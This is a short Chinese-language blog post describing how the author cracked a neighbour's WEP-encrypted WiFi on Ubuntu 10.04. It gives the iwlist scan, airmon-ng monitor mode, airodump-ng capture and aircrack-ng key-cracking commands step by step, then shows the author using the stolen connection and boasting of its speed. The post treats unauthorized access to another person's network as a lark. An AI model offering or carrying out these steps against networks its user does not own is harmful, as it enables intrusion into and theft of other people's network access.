Ubuntu 10.04 破解 WEP

Ubuntu 10.04 破解 WEP

家里没有网络。但是扫描了一下 WIFI，嘿嘿，发现猎物咯！WEP 加密，信号强度还这么好的一个 WIFI AP。虽然早就知道 WEP 这个东西有还不如没有，容易破解的很，但是很少有机会破人家的信号，因为自己有 3G 上网卡啊。但是被别人借走罢了。自动动手破解吧，我的网卡是 EeePC 的 RaLink RT2860。

$ iwlist wlan0 scan
wlan0 Scan completed :
Cell 01 – Address: 00:25:86:XX:XX:XX
Protocol:802.11b/g
ESSID:”FAST_XXXXXX”
Mode:Managed
Channel:6
Quality:91/100 Signal level:-54 dBm Noise level:-81 dBm
Encryption key:on
Bit Rates:36 Mb/s

　　OK，开始吧。虽然网上很多教程里开头就让你改 MAC 地址，我感觉没什么用，反正都用 WEP 加密了，还希望他能把你抓出来？

　　首先打开网卡的监听模式（又称为混杂模式），这里我的网卡编号为 wlan0，目标的 WIFI AP 位于 channel 6，那么则为

$ sudo airmon-ng wlan0 6
　　这个时候就应该看到提示说，monitor mode enabled，继续抓包就行

$ sudo airodump-ng -w a.cap --channel 6 wlan0
　　这样会把抓到的所有数据包放在 a.cap 中。更悲剧的是，我的无线网卡不知道因为驱动原因还是内核原因，都无法使用 injection，所以…无法攻击 AP 使其返回足够算出密码的数据包。那么只好慢慢的抓了，这里我抓了一个上午，搞到了 20K 个包，理论上来说完全足够了已经。下面就是要算出来 KEY 啦

$ sudo aircrack-ng -x a.cap
　　这里我加入了 -x 参数，让破解时候使用暴力穷举的方法。不出1分钟，密码就被算出来了，如图

　　使用算出来的密码连接上去，很给力喔，连接 anyLinux 下载文件测试，速度能有多快？达到了 839K/s 的速度，比在学校给力

2010-09-23 14:02:44 (836 KB/s) – `file’ saved [104857600/104857600]